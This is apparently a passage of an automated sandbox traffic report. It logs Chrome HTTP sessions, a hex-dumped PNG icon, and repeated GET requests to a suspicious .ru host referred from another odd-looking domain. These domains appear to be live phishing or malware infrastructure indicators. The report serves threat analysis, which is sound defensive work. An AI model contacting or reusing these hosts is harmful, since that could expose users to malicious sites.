                                                                                                                                                                                                                            2025-02-11 15:27:15 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                                                                                                                                                                            Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            16192.168.2.649752104.21.2.84436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:22 UTC565OUTGET /loray@la8j4pj HTTP/1.1
                                                                                                                                                                                                                            Host: ajcs6.revishbos.ru
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Origin: https://8l.dichotomou8.com
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Referer: https://8l.dichotomou8.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:23 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:23 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VK3GhHylRRab03EG5RQJ%2FsqpfF3qw2ehK27NT7cH1KCfwuwTbg7e1FQxuzXnWnjIKHXVl2rbso0H%2F6XKB6TPm%2FAZ2KXeUIpNK%2BsWE0EHr%2BAlxjraaqtgJy0LEVPy8uCWlfUcAd8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055cd71bd44339-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1639&rtt_var=702&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1143&delivery_rate=1781574&cwnd=231&unsent_bytes=0&cid=5f081a00c504fa97&ts=598&x=0"
                                                                                                                                                                                                                            2025-02-11 15:27:23 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                            Data Ascii: 11
                                                                                                                                                                                                                            2025-02-11 15:27:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            17192.168.2.649755172.67.186.2004436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:24 UTC355OUTGET /loray@la8j4pj HTTP/1.1
                                                                                                                                                                                                                            Host: ajcs6.revishbos.ru
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:24 UTC825INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:24 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKh4uF8TERZ7GZdFhaqeVam0sF3sLD1kOkMQ%2FLnluBo%2FkRKIzzVrYsT7%2Fro4mXrSecJrmb34ic8YAOpFaGIca4Qx4plqcI3laFepVmdX2vHw2EONJOEfT3jyNQJjm%2BDHlLEbHgY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 91055ce1ad5c430d-EWR
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=2050&rtt_var=780&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=933&delivery_rate=1391801&cwnd=234&unsent_bytes=0&cid=310b4392d3d46e02&ts=599&x=0"
                                                                                                                                                                                                                            2025-02-11 15:27:24 UTC6INData Raw: 31 0d 0a 3